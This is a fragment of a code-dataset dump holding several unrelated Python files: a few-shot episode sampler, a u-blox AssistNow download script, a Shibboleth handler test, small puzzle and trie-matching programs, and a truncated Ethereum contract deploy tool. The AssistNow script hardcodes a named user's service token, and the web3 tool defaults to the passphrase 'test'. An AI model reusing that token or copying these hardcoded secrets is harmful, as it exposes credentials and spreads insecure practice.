of the sampled base\n categories.\n Knovel: a list of lenght 'nKnovel' with the ids of the sampled novel\n categories.\n \"\"\"\n if self.is_eval_mode:\n assert(nKnovel <= self.dataset.num_cats_novel)\n # sample from the set of base categories 'nKbase' number of base\n # categories.\n Kbase = sorted(self.sampleCategories('base', nKbase))\n # sample from the set of novel categories 'nKnovel' number of novel\n # categories.\n Knovel = sorted(self.sampleCategories('novel', nKnovel))\n else:\n # sample from the set of base categories 'nKnovel' + 'nKbase' number\n # of categories.\n cats_ids = self.sampleCategories('base', nKnovel+nKbase)\n assert(len(cats_ids) == (nKnovel+nKbase))\n # Randomly pick 'nKnovel' number of fake novel categories and keep\n # the rest as base categories.\n random.shuffle(cats_ids)\n Knovel = sorted(cats_ids[:nKnovel])\n Kbase = sorted(cats_ids[nKnovel:])\n\n return Kbase, Knovel\n\n def sample_test_examples_for_base_categories(self, Kbase, nTestBase):\n \"\"\"\n Sample `nTestBase` number of images from the `Kbase` categories.\n\n Args:\n Kbase: a list of length `nKbase` with the ids of the categories from\n where the images will be sampled.\n nTestBase: the total number of images that will be sampled.\n\n Returns:\n Tbase: a list of length `nTestBase` with 2-element tuples. The 1st\n element of each tuple is the image id that was sampled and the\n 2nd elemend is its category label (which is in the range\n [0, len(Kbase)-1]).\n \"\"\"\n Tbase = []\n if len(Kbase) > 0:\n # Sample for each base category a number images such that the total\n # number sampled images of all categories to be equal to `nTestBase`.\n KbaseIndices = np.random.choice(\n np.arange(len(Kbase)), size=nTestBase, replace=True)\n KbaseIndices, NumImagesPerCategory = np.unique(\n KbaseIndices, return_counts=True)\n\n for Kbase_idx, NumImages in zip(KbaseIndices, NumImagesPerCategory):\n imd_ids = self.sampleImageIdsFrom(\n Kbase[Kbase_idx], sample_size=NumImages)\n Tbase += [(img_id, Kbase_idx) for img_id in imd_ids]\n\n assert(len(Tbase) == nTestBase)\n\n return Tbase\n\n def sample_train_and_test_examples_for_novel_categories(\n self, Knovel, nTestNovel, nExemplars, nKbase):\n \"\"\"Samples train and test examples of the novel categories.\n\n Args:\n \t Knovel: a list with the ids of the novel categories.\n nTestNovel: the total number of test images that will be sampled\n from all the novel categories.\n nExemplars: the number of training examples per novel category that\n will be sampled.\n nKbase: the number of base categories. It is used as offset of the\n category index of each sampled image.\n\n Returns:\n Tnovel: a list of length `nTestNovel` with 2-element tuples. The\n 1st element of each tuple is the image id that was sampled and\n the 2nd element is its category label (which is in the range\n [nKbase, nKbase + len(Knovel) - 1]).\n Exemplars: a list of length len(Knovel) * nExemplars of 2-element\n tuples. The 1st element of each tuple is the image id that was\n sampled and the 2nd element is its category label (which is in\n the ragne [nKbase, nKbase + len(Knovel) - 1]).\n \"\"\"\n\n if len(Knovel) == 0:\n return [], []\n\n nKnovel = len(Knovel)\n Tnovel = []\n Exemplars = []\n assert((nTestNovel % nKnovel) == 0)\n nEvalExamplesPerClass = int(nTestNovel / nKnovel)\n\n for Knovel_idx in range(len(Knovel)):\n imd_ids = self.sampleImageIdsFrom(\n Knovel[Knovel_idx],\n sample_size=(nEvalExamplesPerClass + nExemplars))\n\n imds_tnovel = imd_ids[:nEvalExamplesPerClass]\n imds_ememplars = imd_ids[nEvalExamplesPerClass:]\n\n Tnovel += [(img_id, nKbase+Knovel_idx) for img_id in imds_tnovel]\n Exemplars += [(img_id, nKbase+Knovel_idx) for img_id in imds_ememplars]\n assert(len(Tnovel) == nTestNovel)\n assert(len(Exemplars) == len(Knovel) * nExemplars)\n random.shuffle(Exemplars)\n\n return Tnovel, Exemplars\n\n def sample_episode(self):\n \"\"\"Samples a training episode.\"\"\"\n nKnovel = self.nKnovel\n nKbase = self.nKbase\n nTestNovel = self.nTestNovel\n nTestBase = self.nTestBase\n nExemplars = self.nExemplars\n\n Kbase, Knovel = self.sample_base_and_novel_categories(nKbase, nKnovel)\n Tbase = self.sample_test_examples_for_base_categories(Kbase, nTestBase)\n Tnovel, Exemplars = self.sample_train_and_test_examples_for_novel_categories(\n Knovel, nTestNovel, nExemplars, nKbase)\n\n # concatenate the base and novel category examples.\n Test = Tbase + Tnovel\n random.shuffle(Test)\n Kall = Kbase + Knovel\n\n return Exemplars, Test, Kall, nKbase\n\n def createExamplesTensorData(self, examples):\n \"\"\"\n Creates the examples image and label tensor data.\n\n Args:\n examples: a list of 2-element tuples, each representing a\n train or test example. The 1st element of each tuple\n is the image id of the example and 2nd element is the\n category label of the example, which is in the range\n [0, nK - 1], where nK is the total number of categories\n (both novel and base).\n\n Returns:\n images: a tensor of shape [nExamples, Height, Width, 3] with the\n example images, where nExamples is the number of examples\n (i.e., nExamples = len(examples)).\n labels: a tensor of shape [nExamples] with the category label\n of each example.\n \"\"\"\n images = torch.stack(\n [self.dataset[img_idx][0] for img_idx, _ in examples], dim=0)\n labels = torch.LongTensor([label for _, label in examples])\n return images, labels\n\n def get_iterator(self, epoch=0):\n rand_seed = epoch\n random.seed(rand_seed)\n np.random.seed(rand_seed)\n def load_function(iter_idx):\n Exemplars, Test, Kall, nKbase = self.sample_episode()\n Xt, Yt = self.createExamplesTensorData(Test)\n Kall = torch.LongTensor(Kall)\n if len(Exemplars) > 0:\n Xe, Ye = self.createExamplesTensorData(Exemplars)\n return Xe, Ye, Xt, Yt, Kall, nKbase\n else:\n return Xt, Yt, Kall, nKbase\n\n tnt_dataset = tnt.dataset.ListDataset(\n elem_list=range(self.epoch_size), load=load_function)\n data_loader = tnt_dataset.parallel(\n batch_size=self.batch_size,\n num_workers=(0 if self.is_eval_mode else self.num_workers),\n shuffle=(False if self.is_eval_mode else True))\n\n return data_loader\n\n def __call__(self, epoch=0):\n return self.get_iterator(epoch)\n\n def __len__(self):\n return int(self.epoch_size / self.batch_size)\n","sub_path":"data/FC100.py","file_name":"FC100.py","file_ext":"py","file_size_in_byte":17153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"235679511","text":"#!/usr/bin/env python3\n\n# Get AssistNow Online data\n# Valid for 2-4 hours\n# Size: 1-3 KB\n# Improves TTFF to 3 seconds (typical)\n\n# curl https://online-live1.services.u-blox.com/GetOnlineData.ashx?token=kdIs4xBnwEivvK3aQJtY9g;gnss=gps,glo;datatype=eph,alm,aux;\n\n# AssistNow Online servers:\n# https://online-live1.services.u-blox.com\n# https://online-live2.services.u-blox.com\n\n# Token (Mapper - John Kua): kdIs4xBnwEivvK3aQJtY9g\n\nimport requests\nimport datetime\nimport os\n\nvalidGnss = ['gps', 'qzss', 'glo', 'bds', 'gal']\nvalidDatatypes = ['eph', 'alm', 'aux', 'pos']\n\ndef getOnlineData(hostUrl, token, gnss=['gps', 'glo'], datatypes=['eph', 'alm', 'aux']):\n for g in gnss:\n if g not in validGnss:\n raise ValueError('{} is not a valid GNSS! Must be one of {}'.format(g, validGnss))\n for d in datatypes:\n if d not in validDatatypes:\n raise ValueError('{} is not a valid datatype! Must be one of {}'.format(d, validDatatypes))\n\n\n url = hostUrl\n url += '/GetOnlineData.ashx?'\n url += 'token={};'.format(token)\n url += 'datatype={};'.format(','.join(datatypes))\n url += 'format=mga;'\n url += 'gnss={};'.format(','.join(gnss))\n response = requests.get(url)\n\n if not response.ok:\n raise Exception('Failed to get data from {}'.format(hostUrl))\n\n return response.content\n\n\nif __name__=='__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--device', '-d', default=None)\n parser.add_argument('--hostUrl', '-H', default='https://online-live1.services.u-blox.com')\n parser.add_argument('--token', '-t', default='kdIs4xBnwEivvK3aQJtY9g')\n parser.add_argument('--outputPath', '-o', default='.', help='Output path')\n args = parser.parse_args()\n\n print('\\nQuerying for AssistNow Online data...')\n downloadDt = datetime.datetime.utcnow()\n data = getOnlineData(args.hostUrl, token='kdIs4xBnwEivvK3aQJtY9g')\n print('\\nReceived {} bytes.'.format(len(data)))\n\n outputFileName = os.path.join(args.outputPath, 'assistNowOnline_{}.bin'.format(downloadDt.strftime('%Y%m%dT%H%M%SZ')))\n print('\\nSaving to {}'.format(outputFileName))\n\n with open(outputFileName, 'wb') as f:\n f.write(data)\n\n print('\\nDone.')\n ","sub_path":"get-assistnowonlinedata.py","file_name":"get-assistnowonlinedata.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"339575372","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2019 RERO.\n#\n# Swiss Open Access Repository is free software; you can redistribute it\n# and/or modify it under the terms of the MIT License; see LICENSE file for\n# more details.\n\n\"\"\"Test authenticator handler.\"\"\"\n\nimport pytest\n\nfrom sonar.modules.shibboleth_authenticator.handlers import \\\n authorized_signup_handler\n\n\ndef test_authorized_signup_handler(app, valid_sp_configuration,\n valid_attributes, monkeypatch):\n \"\"\"Test signup handler.\"\"\"\n app.config.update(SHIBBOLETH_SERVICE_PROVIDER=valid_sp_configuration)\n\n class MockResponse(object):\n \"\"\"Mock SAML auth object.\"\"\"\n\n def get_attributes(self):\n \"\"\"Return valid attributes for authentication.\"\"\"\n return valid_attributes\n\n auth = MockResponse()\n\n # Unavailable configuration\n with pytest.raises(KeyError):\n authorized_signup_handler(auth)\n\n # Test valid configuration\n assert authorized_signup_handler(auth, 'idp').status_code == 302\n\n # Test redirect to next url\n monkeypatch.setattr(\n 'sonar.modules.shibboleth_authenticator.handlers.get_session_next_url',\n lambda remote_app: '/test/')\n response = authorized_signup_handler(auth, 'idp')\n assert response.status_code == 302\n assert '/test/' in response.location\n\n class MockUser(object):\n \"\"\"Mock user.\"\"\"\n\n def is_authenticated(self):\n \"\"\"Return if user is authenticated.\"\"\"\n return False\n\n # Test oauth authentication failure\n monkeypatch.setattr(\n 'sonar.modules.shibboleth_authenticator.handlers.oauth_authenticate',\n lambda remote, user, require_existing_link: False)\n response = authorized_signup_handler(auth, 'idp')\n assert response.status_code == 302\n assert '/login/' in response.location\n\n # Test oauth register failure\n monkeypatch.setattr(\n 'sonar.modules.shibboleth_authenticator.handlers.current_user',\n MockUser())\n monkeypatch.setattr(\n 'sonar.modules.shibboleth_authenticator.handlers.oauth_get_user',\n lambda remote, account_info: None)\n monkeypatch.setattr(\n 'sonar.modules.shibboleth_authenticator.handlers.oauth_register',\n lambda form: None)\n response = authorized_signup_handler(auth, 'idp')\n assert response.status_code == 302\n assert '/login/' in response.location\n","sub_path":"tests/ui/shibboleth_authenticator/test_shibboleth_handlers.py","file_name":"test_shibboleth_handlers.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"581767705","text":"import sys\n\nwith open(sys.argv[1], 'r') as test_cases:\n for test in test_cases:\n l = test.strip().split(\" \")\n try:\n elem = min(list(filter(lambda x: l.count(x) == 1 , l)))\n print(l.index(elem)+1)\n except ValueError:\n print(0)\n","sub_path":"uniq.py","file_name":"uniq.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"421508092","text":"# python3\r\nimport sys\r\n\r\nTERM = '$'\r\n\r\n\r\n# e.g. {0:{'A':1,'T':2},1:{'C':3}}\r\ndef build_trie(patterns):\r\n tree = {0: {}}\r\n id_counter = 0\r\n\r\n for pattern in patterns:\r\n curr_node_id = 0\r\n for curr_char in pattern:\r\n\r\n # check if node already exists\r\n if curr_char in tree[curr_node_id]:\r\n curr_node_id = tree[curr_node_id][curr_char]\r\n continue\r\n\r\n # new node\r\n id_counter += 1\r\n new_node_id = id_counter\r\n tree[new_node_id] = {}\r\n tree[curr_node_id][curr_char] = new_node_id\r\n curr_node_id = new_node_id\r\n\r\n tree[curr_node_id][TERM] = {}\r\n\r\n return tree\r\n\r\n\r\ndef solve(text, n, patterns):\r\n result = []\r\n trie = build_trie(patterns)\r\n\r\n for i_start in range(len(text)):\r\n i_curr = i_start\r\n curr_char = text[i_curr]\r\n curr_node_id = 0\r\n\r\n while True:\r\n # leaf\r\n if not trie[curr_node_id] or TERM in trie[curr_node_id]:\r\n result.append(i_start)\r\n break\r\n # there is an edge with val == current char, let's move on\r\n elif curr_char in trie[curr_node_id]:\r\n if TERM in trie[curr_node_id]:\r\n result.append(i_start)\r\n break\r\n curr_node_id = trie[curr_node_id][curr_char]\r\n i_curr += 1\r\n curr_char = text[i_curr] if i_curr < len(text) else None\r\n # no pattern for this subtext\r\n else:\r\n break\r\n\r\n return result\r\n\r\n\r\ndef test():\r\n pass\r\n\r\n\r\ndef main():\r\n text = sys.stdin.readline().strip()\r\n n = int(sys.stdin.readline().strip())\r\n patterns = []\r\n for _ in range(n):\r\n patterns += [sys.stdin.readline().strip()]\r\n\r\n ans = solve(text, n, patterns)\r\n\r\n sys.stdout.write(' '.join(map(str, ans)) + '\\n')\r\n\r\n\r\nif __name__ == '__main__':\r\n test()\r\n main()","sub_path":"course_04_strings/w01/trie_matching_extended/trie_matching_extended.py","file_name":"trie_matching_extended.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"333024181","text":"import os, sys, time, json, getopt, asyncio\nfrom web3 import Web3\nfrom solc import link_code\n# from solc import compile_files\nfrom solc import compile_source\nfrom web3.middleware import geth_poa_middleware\n\n\ndef myProvider(provider_url, passphrase=\"test\"):\n # web3.py instance\n # w3 = Web3(Web3.EthereumTesterProvider())\n # PoA共识机制下api需要注入PoA中间件\n if 'http' in provider_url:\n w3 = Web3(Web3.HTTPProvider(provider_url))\n else:\n w3 = Web3(Web3.WebsocketProvider(provider_url))\n w3.middleware_stack.inject(geth_poa_middleware, layer=0)\n w3.eth.defaultAccount = w3.eth.accounts[0]\n if passphrase is not None and passphrase != '':\n w3.personal.unlockAccount(w3.eth.defaultAccount, passphrase)\n return w3\n\n\n# 解锁默认账号\ndef unlockAccount(w3, addr, passphrase):\n # set pre-funded account as sender\n w3.personal.unlockAccount(addr, passphrase)\n\n\ndef javait(contract, output, java):\n if output == '' or not os.path.exists(output):\n output = \"./\"\n if os.path.isfile(output):\n output = os.path.dirname(output)\n abifile = os.path.join(output, contract['name'] + '.abi')\n binfile = os.path.join(output, contract['name'] + '.bin')\n with open(abifile, 'w', encoding='utf-8') as wf:\n wf.write(json.dumps(contract['abi']))\n with open(binfile, 'w', encoding='utf-8') as wf:\n wf.write(json.dumps(contract['bytecode']))\n cmd = \"web3j solidity generate %s %s -o %s -p %s\" % (binfile, abifile, output, java)\n os.system(cmd)\n os.remove(abifile)\n os.remove(binfile)\n\n\ndef compiler(source, output, java, mode='file'):\n # 读取合约\n csc = ''\n contracts = []\n if mode != 'file':\n csc = source\n else:\n try:\n with open(source, 'r', encoding='utf-8') as rf:\n csc = rf.read()\n except Exception as ex:\n print('read file error: ' + str(ex))\n try:\n # 编译合约源码\n compiledSol = compile_source(csc)\n # contractId, contractInterface = compiledSol.popitem()\n for contractId, contractInterface in compiledSol.items():\n ctt = {}\n ast = contractInterface['ast']['children']\n for item in ast:\n if len(item['attributes'].keys()) > 2:\n if str(contractId).split(':')[-1] == str(item['attributes']['name']):\n # ctt['name'] = contractId\n ctt['name'] = str(contractId).split(':')[-1]\n ctt['type'] = item['attributes']['contractKind']\n ctt['abi'] = contractInterface['abi']\n ctt['bytecode'] = contractInterface['bin']\n contracts.append(ctt)\n if java != '':\n javait(contracts[-1], output, java)\n if output != '':\n with open(output, 'w', encoding='utf-8') as wf:\n wf.write(json.dumps({'contracts': contracts}))\n except Exception as ex:\n print('compile error: ' + str(ex))\n return contracts\n\n\n# 部署合约\ndef deploy(w3, contracts, params, output, java):\n subaddrs = {}\n contractInfo = {}\n for cont in contracts:\n if '__' not in cont['bytecode']:\n # 生成合约对象\n Contract = w3.eth.contract(abi=cont['abi'], bytecode=cont['bytecode'])\n # 部署合约\n txhash = Contract.constructor().transact(params)\n # 等待合约部署交易完成\n txreceipt = w3.eth.waitForTransactionReceipt(txhash)\n # print(txreceipt)\n if txreceipt['status'] == 1:\n subaddrs[cont['name']] = txreceipt.contractAddress\n contractInfo[cont['name']] = {\n 'name': cont['name'],\n 'address': txreceipt.contractAddress,\n 'abi': cont['abi'],\n 'bytecode': cont['bytecode']\n }\n # print(tx_receipt)\n for cont in contracts:\n if '__' in cont['bytecode']:\n abi = cont['abi']\n bytecode = link_code(cont['bytecode'], subaddrs)\n # 生成合约对象\n Contract = w3.eth.contract(abi=abi, bytecode=bytecode)\n # 部署合约\n txhash = Contract.constructor().transact(params)\n # 等待合约部署交易��成\n txreceipt = w3.eth.waitForTransactionReceipt(txhash)\n # print(txreceipt)\n if txreceipt['status'] == 1:\n subaddrs[cont['name']] = txreceipt.contractAddress\n # 将合约地址和abi进行json化保存到本地文件\n # print(bytecode)\n contractInfo[cont['name']] = {\n 'name': cont['name'],\n 'address': txreceipt.contractAddress,\n 'abi': cont['abi'],\n 'bytecode': bytecode\n }\n if java != '':\n javait(tuple(contractInfo.values())[-1], output, java)\n if output != '':\n with open(output, 'w', encoding='utf-8') as wf:\n wf.write(json.dumps(contractInfo))\n return contractInfo\n\n\ndef invoke(w3, fr, to, value):\n txhash = w3.eth.sendTransaction({'to': to, 'from': fr, 'value': value})\n txreceipt = w3.eth.waitForTransactionReceipt(txhash)\n if txreceipt['status'] == 1:\n return 'Succ'\n else:\n return 'Fail'\n\n\ndef monitor(w3):\n def handle_event(event, ftype):\n if ftype == 'block':\n print('block'.center(15, ' ').center(100, '-'))\n print(w3.eth.getBlock(event))\n if ftype == 'transaction':\n print('receipt'.center(15, ' ').center(100, '-'))\n print(w3.eth.waitForTransactionReceipt(event))\n print('transaction'.center(15, ' ').center(100, '-'))\n print(w3.eth.getTransaction(event))\n # and whatever\n\n async def log_loop(event_filter, ftype, poll_interval):\n while True:\n for event in event_filter.get_new_entries():\n handle_event(event, ftype)\n await asyncio.sleep(poll_interval)\n\n # block_filter = contract.events.WatchDog.createFilter(fromBlock='latest') # 显示字符串\n block_filter = w3.eth.filter('latest') # 显示字节码\n tx_filter = w3.eth.filter('pending')\n loop = asyncio.get_event_loop()\n try:\n loop.run_until_complete(asyncio.gather(log_loop(block_filter, 'block', 2), log_loop(tx_filter, 'transaction', 2)))\n finally:\n loop.close()\n\n\ndef query(w3, arg):\n try:\n if len(arg) > 2 and arg[:2] == '0x':\n blk = w3.eth.getBlock(arg)\n else:\n blk = w3.eth.getBlock(int(arg))\n return {'query': {'type': 'block', 'block': blk}}\n except Exception as ex:\n try:\n tx = w3.eth.getTransaction(str(arg))\n receipt = w3.eth.getTransactionReceipt(str(arg))\n return {'query': {'type': 'transaction', 'transaction': tx, 'receipt': receipt}}\n except Exception as ex:\n print('query failed: ' + str(ex))\n return {}\n\n\ndef info(w3):\n info = {}\n version = w3.version\n info['version'] = {'api': version.api, 'node': version.node, 'network': version.node, 'ethereum': version.ethereum}\n info['mining'] = w3.eth.mining\n info['syncing'] = w3.eth.syncing\n info['coinbase'] = w3.eth.coinbase\n info['accounts'] = w3.eth.accounts\n info['blocknumber'] = w3.eth.blockNumber\n info['txpool'] = w3.txpool.status\n info['nodeinfo'] = w3.admin.nodeInfo\n info['peers'] = w3.admin.peers\n info['datadir'] = w3.admin.datadir\n info['hashrate'] = w3.eth.hashrate\n info['gaslimit'] = w3.eth.getBlock('latest').gasLimit\n info['gasprice'] = w3.eth.gasPrice\n return info\n\n\ndef usage(mode):\n if mode == 'compile':\n print(\"Usage:%s -c/--compile -f/--fname [-o/--output